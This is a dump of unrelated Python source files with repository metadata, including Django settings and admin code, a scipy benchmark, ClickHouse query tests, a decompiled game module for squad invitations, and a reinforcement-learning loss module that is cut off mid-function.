Note that ``env`` is passed in as a keyword argument.
"""
@wraps(test_case)
def run_test(self=None, env=None, **kwargs):
test_completed = False
if self is not None:
kwargs['self'] = self
def complete_test_case():
__tracebackhide__ = True
nonlocal test_completed
yield from test_case(env=env, **kwargs)
test_completed = True
__tracebackhide__ = True
env.process(complete_test_case())
result = env.run()
if not test_completed:
raise UnfinishedTest(test_case)
return result
return run_test
| [
"[email protected]"
]
| |
352e1986d5a4bcac3ff903fd27c91bb9134f049b | a904e99110721719d9ca493fdb91679d09577b8d | /month04/project/day01-note/django-redis-4.10.0/tests/test_sqlite_herd.py | 8a053dfdee6155fadba6c8df1a27d172aada7270 | [
"Apache-2.0",
"BSD-3-Clause"
]
| permissive | chaofan-zheng/tedu-python-demo | 7c7c64a355e5380d1f8b6464affeddfde0d27be7 | abe983ddc52690f4726cf42cc6390cba815026d8 | refs/heads/main | 2023-03-12T05:17:34.596664 | 2021-02-27T08:33:31 | 2021-02-27T08:33:31 | 323,350,480 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,113 | py | SECRET_KEY = "django_tests_secret_key"
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': [
'127.0.0.1:6379:5',
],
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.HerdClient',
}
},
"doesnotexist": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:56379?db=1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.HerdClient",
}
},
'sample': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': '127.0.0.1:6379:1,127.0.0.1:6379:1',
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.HerdClient',
}
},
"with_prefix": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379?db=1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.HerdClient",
},
"KEY_PREFIX": "test-prefix",
},
}
# TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
INSTALLED_APPS = (
"django.contrib.sessions",
)
| [
"[email protected]"
]
| |
c6a4f7fd762b8c458facb55f5b26d1bc13b3c944 | e16d7d8f60145c68640b25aa7c259618be60d855 | /django_by_example/myshop/orders/admin.py | f09d215605498c4504e1c955a53d7fe07aa330af | []
| no_license | zongqiqi/mypython | bbe212223002dabef773ee0dbeafbad5986b4639 | b80f3ce6c30a0677869a7b49421a757c16035178 | refs/heads/master | 2020-04-21T07:39:59.594233 | 2017-12-11T00:54:44 | 2017-12-11T00:54:44 | 98,426,286 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | from django.contrib import admin
from .models import Order,OrderItem
class OrderItemInline(admin.TabularInline):
model = OrderItem
raw_id_fields = ['product']
class OrderAdmin(admin.ModelAdmin):
list_display = ['id', 'first_name', 'last_name', 'email','address', 'postal_code', 'city', 'paid','created', 'updated']
list_filter = ['paid', 'created', 'updated']
inlines = [OrderItemInline]#使用OrderItemline来把OrderItem引用为OrderAdmin类的内联类
#内联类允许你在同一个编辑页面引用模型,并且将这个模型作为父模型
admin.site.register(Order, OrderAdmin) | [
"[email protected]"
]
| |
863e45c0783451eb725d9e5182ae2b3154aabdaf | c2634ebec1d4448e372d174f459c3cbc03fd1edc | /lib/node_modules/@stdlib/math/base/special/cosm1/benchmark/python/scipy/benchmark.py | 0f15a4ea4a9a905870399f1ccf3964f8e9ad5d86 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"SunPro",
"BSD-3-Clause",
"BSL-1.0",
"LicenseRef-scancode-public-domain"
]
| permissive | stdlib-js/stdlib | ede11aee78f08e4f78a0bb939cb0bc244850b55b | f10c6e7db1a2b15cdd2b6237dd0927466ebd7278 | refs/heads/develop | 2023-09-05T03:29:36.368208 | 2023-09-03T22:42:11 | 2023-09-03T22:42:11 | 54,614,238 | 4,163 | 230 | Apache-2.0 | 2023-09-13T21:26:07 | 2016-03-24T04:19:52 | JavaScript | UTF-8 | Python | false | false | 2,198 | py | #!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark scipy.special.cosm1."""
from __future__ import print_function
import timeit
NAME = "cosm1"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from scipy.special import cosm1; from random import random;"
stmt = "y = cosm1(4.0*random() - 2.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::scipy::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
d7b781bab6353a104d0b726b33244a8255434f2b | d47cd584579452a8212a19ffee462f0c2e792a9c | /fluent_contents/utils/tagparsing.py | 0267274366501f593eb3eb2a955f356a98482d1c | [
"Apache-2.0"
]
| permissive | kerin/django-fluent-contents | 9db6d397c3b5aeebc4691e3b8ad6f09fbbd50c41 | d760e7d1648f4583bdd8ba4c3078a3f5d9f544b4 | refs/heads/master | 2021-01-15T17:55:28.346869 | 2013-02-11T14:26:04 | 2013-02-11T14:26:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | from django.template.base import TemplateSyntaxError, Token
import re
kwarg_re = re.compile('^(?P<name>\w+)=')
def parse_token_kwargs(parser, token, compile_args=False, compile_kwargs=False, allowed_kwargs=None):
"""
Allow the template tag arguments to be like a normal Python function, with *args and **kwargs.
"""
if isinstance(token, Token):
bits = token.split_contents()
else:
bits = token
expect_kwarg = False
args = []
kwargs = {}
prev_bit = None
for bit in bits[1::]:
match = kwarg_re.match(bit)
if match:
expect_kwarg = True
(name, expr) = bit.split('=', 2)
kwargs[name] = parser.compile_filter(expr) if compile_args else expr
else:
if expect_kwarg:
raise TemplateSyntaxError("{0} tag may not have a non-keyword argument ({1}) after a keyword argument ({2}).".format(bits[0], bit, prev_bit))
args.append(parser.compile_filter(bit) if compile_kwargs else bit)
prev_bit = bit
# Validate the allowed arguments, to make things easier for template developers
if allowed_kwargs is not None:
for name in kwargs:
if name not in allowed_kwargs:
raise AttributeError("The option %s=... cannot be used in '%s'.\nPossible options are: %s." % (name, bits[0], ", ".join(allowed_kwargs)))
return args, kwargs
| [
"[email protected]"
]
| |
169eefc9524590604288b8376f8c1f4d487c5c88 | fa78cd539cade5bba07e393c8d1184be58a6477a | /waste_collection/admin.py | a67fc1b7b28aa161d2dfddec85b68688bc9f5d76 | []
| no_license | iLabs-Makerere-University/tilenga-crm-django | e2c3e8777f012052a8cd77af5e06b9ae2180f805 | f764153e9c5877e20be1a1c1459de9fcb2b9df07 | refs/heads/master | 2020-04-29T22:08:04.113720 | 2019-04-01T08:18:15 | 2019-04-01T08:18:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | from django.contrib import admin
from . models import WasteManagementProcedure
class WasteManagementProcedureAdmin(admin.ModelAdmin):
pass
admin.site.register(WasteManagementProcedure, WasteManagementProcedureAdmin)
| [
"[email protected]"
]
| |
601dc711804496f547111d1d953946085dd3b498 | e07da133c4efa517e716af2bdf67a46f88a65b42 | /hub20/apps/ethereum_money/management/commands/load_tracked_tokens.py | 5701e391f3f536030bd13c896353e2c518edd93a | [
"MIT"
]
| permissive | cryptobuks1/hub20 | be1da5f77a884f70068fd41edaa45d5e65b7c35e | 3a4d9cf16ed9d91495ac1a28c464ffb05e9f837b | refs/heads/master | 2022-04-19T21:26:15.386567 | 2020-04-19T07:17:47 | 2020-04-19T07:17:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | import logging
from django.core.management.base import BaseCommand
from eth_utils import to_checksum_address
from hub20.apps.ethereum_money.app_settings import TRACKED_TOKENS
from hub20.apps.ethereum_money.models import EthereumToken
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "Loads data relevant to all tokens that are going to be used by the instance"
def handle(self, *args, **options):
for token_address in TRACKED_TOKENS:
logger.info(f"Checking token {token_address}...")
try:
EthereumToken.make(to_checksum_address(token_address))
except OverflowError:
logger.error(f"{token_address} is not a valid address or not ERC20-compliant")
except Exception as exc:
logger.exception(f"Failed to load token data for {token_address}", exc_info=exc)
| [
"[email protected]"
]
| |
6ef6540bd2180186c923cbd1e76bfd2414db3f1d | ec6b94f8fa4558f2156f5cdf1ab0347fb5573241 | /tests/clickhouse/query_dsl/test_project_id.py | ce274c9a8930b4499e68fc3e9dba3946378cca79 | [
"Apache-2.0",
"BUSL-1.1"
]
| permissive | pombredanne/snuba | 8e9a55bf38b3ac84407d0c2755e3c0ac226688de | eb1d25bc52320bf57a40fd6efc3da3dd5e9f1612 | refs/heads/master | 2021-08-27T20:55:46.392979 | 2021-08-14T08:21:47 | 2021-08-14T08:21:47 | 171,631,594 | 0 | 0 | Apache-2.0 | 2020-01-10T10:42:17 | 2019-02-20T08:26:17 | Python | UTF-8 | Python | false | false | 4,583 | py | from typing import Any, MutableMapping, Set
import pytest
from snuba.clickhouse.query_dsl.accessors import get_object_ids_in_query_ast
from snuba.datasets.factory import get_dataset
from snuba.datasets.plans.translator.query import identity_translate
from snuba.query.parser import parse_query
test_cases = [
(
{"selected_columns": ["column1"], "conditions": [["project_id", "=", 100]]},
{100},
), # Simple single project condition
(
{
"selected_columns": ["column1"],
"conditions": [["project_id", "IN", [100, 200, 300]]],
},
{100, 200, 300},
), # Multiple projects in the query
(
{
"selected_columns": ["column1"],
"conditions": [["project_id", "IN", (100, 200, 300)]],
},
{100, 200, 300},
), # Multiple projects in the query provided as tuple
(
{"selected_columns": ["column1"], "conditions": []},
None,
), # No project condition
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
["project_id", "IN", [300, 400, 500]],
],
},
{300},
), # Multiple project conditions, intersected together
(
{
"selected_columns": ["column1"],
"conditions": [
[
["project_id", "IN", [100, 200, 300]],
["project_id", "IN", [300, 400, 500]],
]
],
},
{100, 200, 300, 400, 500},
), # Multiple project conditions, in union
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
["project_id", "=", 400],
],
},
set(),
), # A fairly stupid query
(
{
"selected_columns": ["column1"],
"conditions": [
["column1", "=", "something"],
[["ifNull", ["column2", 0]], "=", 1],
["project_id", "IN", [100, 200, 300]],
[("count", ["column3"]), "=", 10],
["project_id", "=", 100],
],
},
{100},
), # Multiple conditions in AND. Two project conditions
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
[["project_id", "=", 100], ["project_id", "=", 200]],
],
},
{100, 200},
), # Main project list in a conditions and multiple project conditions in OR
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
[
[["ifNull", ["project_id", 1000]], "=", 100],
[("count", ["column3"]), "=", 10],
[["ifNull", ["project_id", 1000]], "=", 200],
],
],
},
{100, 200, 300},
), # Main project list in a conditions and multiple project conditions within unsupported function calls
(
{
"selected_columns": ["column1"],
"conditions": [
[
[
"and",
[
["equals", ["project_id", 100]],
["equals", ["column1", "'something'"]],
],
],
"=",
1,
],
[
[
"and",
[
["equals", ["project_id", 200]],
["equals", ["column3", "'something_else'"]],
],
],
"=",
1,
],
],
},
None,
), # project_id in unsupported functions (cannot navigate into an "and" function)
# TODO: make this work as it should through the AST.
]
@pytest.mark.parametrize("query_body, expected_projects", test_cases)
def test_find_projects(
query_body: MutableMapping[str, Any], expected_projects: Set[int]
) -> None:
events = get_dataset("events")
query = identity_translate(parse_query(query_body, events))
project_ids_ast = get_object_ids_in_query_ast(query, "project_id")
assert project_ids_ast == expected_projects
| [
"[email protected]"
]
| |
4df8edf8fd0b18807fd1e09544c4b2f48e36594d | ec0b8bfe19b03e9c3bb13d9cfa9bd328fb9ca3f1 | /res/packages/scripts/scripts/client/gui/battle_control/arena_info/invitations.py | b1b060087fc9dc86befe5e49b3490250cc218ed0 | []
| no_license | webiumsk/WOT-0.9.20.0 | de3d7441c5d442f085c47a89fa58a83f1cd783f2 | 811cb4e1bca271372a1d837a268b6e0e915368bc | refs/heads/master | 2021-01-20T22:11:45.505844 | 2017-08-29T20:11:38 | 2017-08-29T20:11:38 | 101,803,045 | 0 | 1 | null | null | null | null | WINDOWS-1250 | Python | false | false | 10,226 | py | # 2017.08.29 21:44:26 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/battle_control/arena_info/invitations.py
import BattleReplay
from adisp import process
from constants import PREBATTLE_TYPE, INVITATION_TYPE
from gui.battle_control.arena_info.settings import INVITATION_DELIVERY_STATUS
from gui.battle_control.requests.context import SendInvitesCtx
from gui.prb_control import prbInvitesProperty
from ids_generators import SequenceIDGenerator
from skeletons.gui.battle_session import ISquadInvitationsHandler
from unit_roster_config import SquadRoster
_STATUS = INVITATION_DELIVERY_STATUS
_SEND_ACTION_NAME = 'DynSquad.SendInvitationToSquad'
_ACCEPT_ACTION_NAME = 'DynSquad.AcceptInvitationToSquad'
_REJECT_ACTION_NAME = 'DynSquad.RejectInvitationToSquad'
class SquadInvitationsFilter(object):
__slots__ = ('__arenaUniqueID', '__isReceivingProhibited', '__isSendingProhibited', '__received', '__sent')
def __init__(self):
super(SquadInvitationsFilter, self).__init__()
self.__arenaUniqueID = 0
self.__isReceivingProhibited = False
self.__isSendingProhibited = False
self.__received = {}
self.__sent = {}
def setArenaUniqueID(self, arenaUniqueID):
self.__arenaUniqueID = arenaUniqueID
def isReceivingProhibited(self):
return self.__isReceivingProhibited
def isSendingProhibited(self):
return self.__isSendingProhibited
def updatePersonalInfo(self, arenaDP):
vInfoVO = arenaDP.getVehicleInfo()
playerInfo = vInfoVO.player
self.__isReceivingProhibited = playerInfo.forbidInBattleInvitations
self.__isSendingProhibited = False
if vInfoVO.isInSquad():
if playerInfo.isPrebattleCreator:
count = arenaDP.getVehiclesCountInPrebattle(vInfoVO.team, vInfoVO.prebattleID)
self.__isSendingProhibited = count >= SquadRoster.MAX_SLOTS
else:
self.__isSendingProhibited = True
def addReceivedInvite(self, invite):
if invite is None:
return (0, _STATUS.NONE)
else:
self.__received[invite.creatorDBID] = invite.clientID
include = _STATUS.RECEIVED_FROM
if not self.__isInviteValid(invite):
include |= _STATUS.RECEIVED_INACTIVE
return (invite.creatorDBID, include)
def addSentInvite(self, invite):
if invite is None:
return (0, _STATUS.NONE)
else:
self.__sent[invite.receiverDBID] = invite.clientID
include = _STATUS.SENT_TO
if not self.__isInviteValid(invite):
include |= _STATUS.SENT_INACTIVE
return (invite.receiverDBID, include)
def filterReceivedInvites(self, getter, added, changed, deleted):
"""Filters received invites.
It's generator that returns item containing tuple(accountDBID, include, exclude).
:param getter: function to get invite data.
:param added: list of invites IDs that are added.
:param changed: list of invites IDs that are changed.
:param deleted: list of invites IDs that are deleted.
"""
for clientID in added:
invite = getter(clientID)
if invite is None:
continue
if not self.__isInviteValid(invite):
continue
self.__received[invite.creatorDBID] = invite.clientID
yield (invite.creatorDBID, _STATUS.RECEIVED_FROM, _STATUS.RECEIVED_INACTIVE)
for clientID in changed:
invite = getter(clientID)
if invite is None:
continue
if self.__isInviteValid(invite):
yield (invite.creatorDBID, _STATUS.RECEIVED_FROM, _STATUS.RECEIVED_INACTIVE)
else:
yield (invite.creatorDBID, _STATUS.RECEIVED_INACTIVE, _STATUS.NONE)
inverted = dict(zip(self.__received.values(), self.__received.keys()))
for clientID in deleted:
if clientID not in inverted:
continue
accountDBID = inverted[clientID]
if self.__received.pop(accountDBID, None) is not None:
yield (accountDBID, _STATUS.NONE, _STATUS.RECEIVED_FROM | _STATUS.RECEIVED_INACTIVE)
return
def filterSentInvites(self, getter, added, changed, deleted):
"""Filters sent invites.
It's generator that returns item containing tuple(accountDBID, include, exclude).
:param getter: function to get invite data.
:param added: list of invites IDs that are added.
:param changed: list of invites IDs that are changed.
:param deleted: list of invites IDs that are deleted.
"""
for clientID in added:
invite = getter(clientID)
if invite is None:
continue
if not self.__isInviteValid(invite):
continue
self.__sent[invite.receiverDBID] = invite.clientID
yield (invite.receiverDBID, _STATUS.SENT_TO, _STATUS.SENT_INACTIVE)
for clientID in changed:
invite = getter(clientID)
if invite is None:
continue
if self.__isInviteValid(invite):
yield (invite.receiverDBID, _STATUS.SENT_TO, _STATUS.SENT_INACTIVE)
else:
yield (invite.receiverDBID, _STATUS.SENT_INACTIVE, _STATUS.NONE)
inverted = dict(zip(self.__sent.values(), self.__sent.keys()))
for clientID in deleted:
if clientID not in inverted:
continue
accountDBID = inverted[clientID]
if self.__sent.pop(accountDBID, None) is not None:
yield (accountDBID, _STATUS.NONE, _STATUS.SENT_TO | _STATUS.SENT_INACTIVE)
return
def __isInviteValid(self, invite):
if invite.type != PREBATTLE_TYPE.SQUAD:
return False
if not invite.isSameBattle(self.__arenaUniqueID):
return False
if not invite.isActive():
return False
return True
class _SquadInvitationsHandler(ISquadInvitationsHandler):
__slots__ = ('__sessionProvider',)
def __init__(self, setup):
super(_SquadInvitationsHandler, self).__init__()
self.__sessionProvider = setup.sessionProvider
@prbInvitesProperty
def prbInvites(self):
return None
def clear(self):
self.__sessionProvider = None
return
def send(self, playerID):
self.__onSendInviteToSquad(playerID)
def accept(self, playerID):
inviteID = self.__getInviteID(playerID, True, True)
if inviteID is not None:
self.prbInvites.acceptInvite(inviteID)
return
def reject(self, playerID):
inviteID = self.__getInviteID(playerID, True, True)
if inviteID is not None:
self.prbInvites.declineInvite(inviteID)
return
@process
def __onSendInviteToSquad(self, playerID):
yield self.__sessionProvider.sendRequest(SendInvitesCtx(databaseIDs=(playerID,)))
def __getInviteID(self, playerID, isCreator, incomingInvites):
invites = self.prbInvites.getInvites(incoming=incomingInvites, onlyActive=True)
if isCreator:
def getter(item):
return item.creatorDBID
else:
def getter(item):
return item.receiverDBID
for invite in invites:
if invite.type == INVITATION_TYPE.SQUAD and getter(invite) == playerID:
return invite.clientID
return None
class _SquadInvitationsRecorder(_SquadInvitationsHandler):
""" This class wraps _SquadInvitationsHandler in order to record player's
actions with dyn squads during replay recording."""
__slots__ = ('__idGen',)
def __init__(self, setup):
super(_SquadInvitationsRecorder, self).__init__(setup)
self.__idGen = SequenceIDGenerator()
def send(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_SEND_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).send(playerID)
def accept(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_ACCEPT_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).accept(playerID)
def reject(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_REJECT_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).reject(playerID)
class _SquadInvitationsPlayer(_SquadInvitationsHandler):
""" This class wraps _SquadInvitationsHandler in order to simulate player's
actions with dyn squads during replay."""
__slots__ = ()
def __init__(self, setup):
super(_SquadInvitationsPlayer, self).__init__(setup)
setCallback = BattleReplay.g_replayCtrl.setDataCallback
for action, method in [(_SEND_ACTION_NAME, self.__onSend), (_ACCEPT_ACTION_NAME, self.__onAccept), (_REJECT_ACTION_NAME, self.__onReject)]:
setCallback(action, method)
def clear(self):
delCallback = BattleReplay.g_replayCtrl.delDataCallback
for eventName, method in [(_SEND_ACTION_NAME, self.__onSend), (_ACCEPT_ACTION_NAME, self.__onAccept), (_REJECT_ACTION_NAME, self.__onReject)]:
delCallback(eventName, method)
super(_SquadInvitationsPlayer, self).clear()
def __onSend(self, _, playerID):
self.send(playerID)
def __onAccept(self, _, playerID):
self.accept(playerID)
def __onReject(self, _, playerID):
self.reject(playerID)
def createInvitationsHandler(setup):
if setup.isReplayPlaying:
handler = _SquadInvitationsPlayer(setup)
elif setup.isReplayRecording:
handler = _SquadInvitationsRecorder(setup)
else:
handler = _SquadInvitationsHandler(setup)
return handler
# okay decompyling c:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\battle_control\arena_info\invitations.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.08.29 21:44:27 Střední Evropa (letní čas)
| [
"[email protected]"
]
| |
fee6c4374d7d6e9eceaa09cf64c3bf93594efe6c | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/9960b43c9cc1e2a2e58da7952283f93d09a1fdc0-<f_regression>-bug.py | 1f2d5280f165e64d4a762027a36feb370bb04cf1 | []
| no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,406 | py |
def f_regression(X, y, center=True):
'Univariate linear regression tests.\n\n Linear model for testing the individual effect of each of many regressors.\n This is a scoring function to be used in a feature seletion procedure, not\n a free standing feature selection procedure.\n\n This is done in 2 steps:\n\n 1. The correlation between each regressor and the target is computed,\n that is, ((X[:, i] - mean(X[:, i])) * (y - mean_y)) / (std(X[:, i]) *\n std(y)).\n 2. It is converted to an F score then to a p-value.\n\n For more on usage see the :ref:`User Guide <univariate_feature_selection>`.\n\n Parameters\n ----------\n X : {array-like, sparse matrix} shape = (n_samples, n_features)\n The set of regressors that will be tested sequentially.\n\n y : array of shape(n_samples).\n The data matrix\n\n center : True, bool,\n If true, X and y will be centered.\n\n Returns\n -------\n F : array, shape=(n_features,)\n F values of features.\n\n pval : array, shape=(n_features,)\n p-values of F-scores.\n\n\n See also\n --------\n mutual_info_regression: Mutual information for a continuous target.\n f_classif: ANOVA F-value between label/feature for classification tasks.\n chi2: Chi-squared stats of non-negative features for classification tasks.\n SelectKBest: Select features based on the k highest scores.\n SelectFpr: Select features based on a false positive rate test.\n SelectFdr: Select features based on an estimated false discovery rate.\n SelectFwe: Select features based on family-wise error rate.\n SelectPercentile: Select features based on percentile of the highest\n scores.\n '
(X, y) = check_X_y(X, y, ['csr', 'csc', 'coo'], dtype=np.float64)
n_samples = X.shape[0]
if center:
y = (y - np.mean(y))
if issparse(X):
X_means = X.mean(axis=0).getA1()
else:
X_means = X.mean(axis=0)
X_norms = np.sqrt((row_norms(X.T, squared=True) - (n_samples * (X_means ** 2))))
else:
X_norms = row_norms(X.T)
corr = safe_sparse_dot(y, X)
corr /= X_norms
corr /= np.linalg.norm(y)
degrees_of_freedom = (y.size - (2 if center else 1))
F = (((corr ** 2) / (1 - (corr ** 2))) * degrees_of_freedom)
pv = stats.f.sf(F, 1, degrees_of_freedom)
return (F, pv)
| [
"[email protected]"
]
| |
6cec2962afd83940865d9b5121ea405fb2a72374 | c5dae77bb3ec7b39dca5c5c0522e101c4cb6d5a8 | /rooms/permissions.py | 8e1b5f8ec4de3e3507e9a1b899d0fbe75120a6cc | []
| no_license | Parkyes90/airbnb-api | f0726018738aad8eaf4ea891bb3de076ad875a36 | f80864757433d0ea0421b2f47d2daab9cf02915f | refs/heads/master | 2023-04-28T21:53:31.687273 | 2022-12-24T01:38:24 | 2022-12-24T01:38:24 | 243,207,499 | 0 | 0 | null | 2023-08-17T17:23:51 | 2020-02-26T08:19:24 | Python | UTF-8 | Python | false | false | 320 | py | from rest_framework.permissions import BasePermission
class IsOwner(BasePermission):
def has_object_permission(self, request, view, obj):
if not hasattr(obj, "user"):
raise Exception("해당 모델이 사용자 필드를 가지고 있지 않습니다.")
return obj.user == request.user
| [
"[email protected]"
]
| |
1cb53ce92897d65d05b8eb78e9534d4bee7e0ba5 | 0fd9644616b5658ea960ef86f28b94cc95ce55e0 | /djangoprj/mikrotik/migrations/0005_mtusers.py | 744c7b72dff4e87a2d85c4bf78cfde2cdfeb1802 | []
| no_license | zdimon/time-control | f4db6f26f15a18c89b91dba3f69a696a9d3a6c28 | 3a212d26dcaae13d3ca5a18247a425f63938fd7c | refs/heads/master | 2020-05-13T16:33:53.011992 | 2019-04-19T07:05:01 | 2019-04-19T07:05:01 | 181,640,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | # Generated by Django 2.2 on 2019-04-17 07:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mikrotik', '0004_auto_20190417_0640'),
]
operations = [
migrations.CreateModel(
name='MTUsers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip', models.CharField(max_length=250)),
('host', models.CharField(max_length=250)),
('mac', models.CharField(max_length=250)),
],
),
]
| [
"[email protected]"
]
| |
5d1c155d585d3b0a1036f0568b04008eafae631a | 5ccd63bc0a51f6cbf8431395e69d263b88c3434d | /agents/policy_gradient/modules/generalized_onpolicy_loss.py | f72276336ffbfb188fb8f2fe5c2ebb405446b09d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | google-research/seed_rl | 12076a223365c700772e9e1ec5fdf6e6aa3dc67d | 0e1e0ac9178a670ad1e1463baed92020e88905ec | refs/heads/master | 2023-08-25T05:07:19.775923 | 2022-11-29T12:41:08 | 2022-11-29T12:41:08 | 215,027,338 | 818 | 164 | Apache-2.0 | 2023-01-16T11:48:01 | 2019-10-14T11:35:42 | Python | UTF-8 | Python | false | false | 11,465 | py | # coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements a generalized onpolicy loss."""
import abc
import inspect
import gin
from seed_rl.agents.policy_gradient.modules import logging_module
import tensorflow as tf
@gin.configurable
class GeneralizedOnPolicyLoss(tf.Module, logging_module.LoggingModule):
"""TensorFlow module implementing the generalized onpolicy loss."""
def __init__(self, agent, reward_normalizer, parametric_action_distribution,
advantage_estimator, policy_loss, discount_factor,
regularizer=None, max_abs_reward=None,
handle_abandoned_episodes_properly=True,
huber_delta=None, value_ppo_style_clip_eps=None,
baseline_cost=1., include_regularization_in_returns=False,
frame_skip=1, reward_scaling=1.0):
"""Creates a GeneralizedOnPolicyLoss."""
self._agent = agent
self._reward_normalizer = reward_normalizer
self._parametric_action_distribution = parametric_action_distribution
self._advantage_estimator = advantage_estimator
self._policy_loss = policy_loss
self._regularizer = regularizer
self._max_abs_reward = max_abs_reward
self._reward_scaling = reward_scaling
self._baseline_cost = baseline_cost
# Provided here so that it is shared.
self._discount_factor = discount_factor
self._frame_skip = frame_skip
self._handle_abandoned_episodes_properly = handle_abandoned_episodes_properly
self._value_ppo_style_clip_eps = value_ppo_style_clip_eps
self._include_regularization_in_returns = include_regularization_in_returns
if huber_delta is not None:
self.v_loss_fn = tf.keras.losses.Huber(
delta=huber_delta, reduction=tf.keras.losses.Reduction.NONE)
else:
self.v_loss_fn = tf.keras.losses.MeanSquaredError(
reduction=tf.keras.losses.Reduction.NONE)
def init(self):
for module in self.submodules:
if hasattr(module, 'init'):
if not inspect.signature(module.init).parameters:
module.init()
def compute_advantages(self, agent_state, prev_actions, env_outputs,
agent_outputs, return_learner_outputs=False):
# Extract rewards and done information.
rewards, done, _, abandoned, _ = tf.nest.map_structure(lambda t: t[1:],
env_outputs)
if self._max_abs_reward is not None:
rewards = tf.clip_by_value(rewards, -self._max_abs_reward,
self._max_abs_reward)
rewards *= self._reward_scaling
# Compute the outputs of the neural networks on the learner.
learner_outputs, _ = self._agent((prev_actions, env_outputs),
agent_state,
unroll=True,
is_training=True)
# At this point, we have unroll length + 1 steps. The last step is only used
# as bootstrap value, so it's removed.
agent_outputs = tf.nest.map_structure(lambda t: t[:-1], agent_outputs)
learner_v = learner_outputs.baseline # current value function
learner_outputs = tf.nest.map_structure(lambda t: t[:-1], learner_outputs)
target_action_log_probs = self._parametric_action_distribution(
learner_outputs.policy_logits).log_prob(agent_outputs.action)
behaviour_action_log_probs = self._parametric_action_distribution(
agent_outputs.policy_logits).log_prob(agent_outputs.action)
# Compute the advantages.
if self._reward_normalizer:
corrected_predictions = self._reward_normalizer.correct_prediction(
learner_v)
unnormalized_predictions = self._reward_normalizer.unnormalize_prediction(
corrected_predictions)
else:
corrected_predictions = learner_v
unnormalized_predictions = learner_v
if not self._handle_abandoned_episodes_properly:
abandoned = tf.zeros_like(abandoned)
done_terminated = tf.logical_and(done, ~abandoned)
done_abandoned = tf.logical_and(done, abandoned)
if self._include_regularization_in_returns and self._regularizer:
